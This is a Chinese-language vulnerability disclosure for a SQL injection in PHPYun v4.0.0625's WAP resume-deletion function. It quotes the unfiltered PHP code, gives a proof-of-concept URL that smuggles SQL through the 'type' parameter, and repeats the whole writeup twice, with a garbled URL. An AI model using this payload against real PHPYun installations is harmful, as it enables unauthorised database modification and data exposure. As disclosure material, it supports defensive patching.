phpyun_v4.0.0625最新版注入（可获取部分数据）

### 简要描述： RT ### 详细说明： 出现在wap\member\model\index.class.php中 ``` function rinfo_action(){ if($_GET['type']&&intval($_GET['id'])){ $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'"); if($nid) { $url=$_GET['type']; $this->obj->DB_update_all("user_resume","`$url`=`$url`-1","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_GET['eid']."'"); $this->complete($resume_row); $data['msg']='删除成功！'; }else{ $data['msg']='删除失败！'; } $data['url']="index.php?c=rinfo&eid=".(int)$_GET['eid']."&type=".$_GET['type']; $this->yunset("layer",$data); } $this->rightinfo(); $this->yunset($this->MODEL('cache')->GetCache(array('city','user','hy','job'))); $rows=$this->obj->DB_select_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $this->yunset("rows",$rows); $this->yunset("type",$_GET['type']); $this->yunset("eid",$_GET['eid']); $this->waptpl('rinfo'); ``` 可见 ``` if($_GET['type']&&intval($_GET['id'])){ $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'"); ``` $_GET['type']被带进去，没有单引号没过滤 我们提交 ``` http://127.0.0.1https://images.seebug.org/upload/wap/member/index.php?c=rinfo&id=1&type=expect%60%20where%20id%3D3%23 ``` [<img src="https://images.seebug.org/upload/201507/10101407576b350e169274d3202c77ff48fa30ca.jpg" alt="360截图-1049312.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/10101407576b350e169274d3202c77ff48fa30ca.jpg) 语句被带进去执行了。 ### 漏洞证明： 出现在wap\member\model\index.class.php中 ``` function rinfo_action(){ if($_GET['type']&&intval($_GET['id'])){ $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'"); if($nid) { $url=$_GET['type']; $this->obj->DB_update_all("user_resume","`$url`=`$url`-1","`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $resume_row=$this->obj->DB_select_once("user_resume","`eid`='".(int)$_GET['eid']."'"); $this->complete($resume_row); $data['msg']='删除成功！'; }else{ $data['msg']='删除失败！'; } $data['url']="index.php?c=rinfo&eid=".(int)$_GET['eid']."&type=".$_GET['type']; $this->yunset("layer",$data); } $this->rightinfo(); $this->yunset($this->MODEL('cache')->GetCache(array('city','user','hy','job'))); $rows=$this->obj->DB_select_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `uid`='".$this->uid."'"); $this->yunset("rows",$rows); $this->yunset("type",$_GET['type']); $this->yunset("eid",$_GET['eid']); $this->waptpl('rinfo'); ``` 可见 ``` if($_GET['type']&&intval($_GET['id'])){ $nid=$this->obj->DB_delete_all("resume_".$_GET['type'],"`eid`='".(int)$_GET['eid']."' and `id`='".(int)$_GET['id']."' and `uid`='".$this->uid."'"); ``` $_GET['type']被带进去，没有单引号没过滤 我们提交 ``` http://127.0.0.1https://images.seebug.org/upload/wap/member/index.php?c=rinfo&id=1&type=expect%60%20where%20id%3D3%23 ``` [<img src="https://images.seebug.org/upload/201507/10101407576b350e169274d3202c77ff48fa30ca.jpg" alt="360截图-1049312.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/10101407576b350e169274d3202c77ff48fa30ca.jpg) 语句被带进去执行了。